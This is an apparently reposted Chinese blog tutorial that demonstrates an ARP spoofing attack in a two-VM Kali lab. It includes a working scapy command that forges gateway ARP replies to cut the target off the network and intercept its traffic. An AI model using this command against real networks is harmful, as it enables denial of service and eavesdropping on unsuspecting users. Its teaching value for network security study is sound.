使用python的scapy库进行局域网内的断网攻击(基于ARP协议)

(使用python scapy库进行网络攻击)

ARP协议

ARP协议的基本功能就是通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。
ARP攻击的局限性:
ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。
无法对外网(互联网、非本区域内的局域网)进行攻击。

操作环境

在虚拟机中完成(两个都是kali系统):
Attkali
Vimkali

目标机器 VimIP:192.168.150.130 VimMAC:00:0C:29:a1:94:6c
网关 GateIP:192.168.150.2 GateMAC:00:50:56:fb:f9:7e
攻击机器 myIP:192.168.150.129 myMAC:00:0c:29:c9:b3:0c

scapy发送虚假应答报文

因为目标主机并不会针对arp的应答报文做有效性检测,因为我们可以主动发送一个虚假的arp应答报文给受害主机以达到欺骗的目的。

Sendp(Ether(dst=VimMAC)/ARP(psrc=GateIP,hwsrc=myMAC,pdst=VimIP,hwdst=VimMAC,op=2),inter=2,count=30)//本行代码目的是欺骗130主机本机是网关,每两秒发送一个数据包,共发送三十个。

攻击前目标主机的arp表,网关的mac地址为00:50:56:fb:f9:7e
在这里插入图片描述
发送欺骗数据包:
使用python的scapy库进行局域网内的断网攻击(基于ARP协议)_第1张图片
给目标主机发送欺骗数据包后,网关的mac地址变为00:0c:29:c9:b3:0c
在这里插入图片描述
即欺骗目标主机,使其将本机当作网关,从而可实现对目标主机的断网攻击,也可在此时进行抓包,从而获取目标主机此时段的通信信息。

你可能感兴趣的:(使用python的scapy库进行局域网内的断网攻击(基于ARP协议))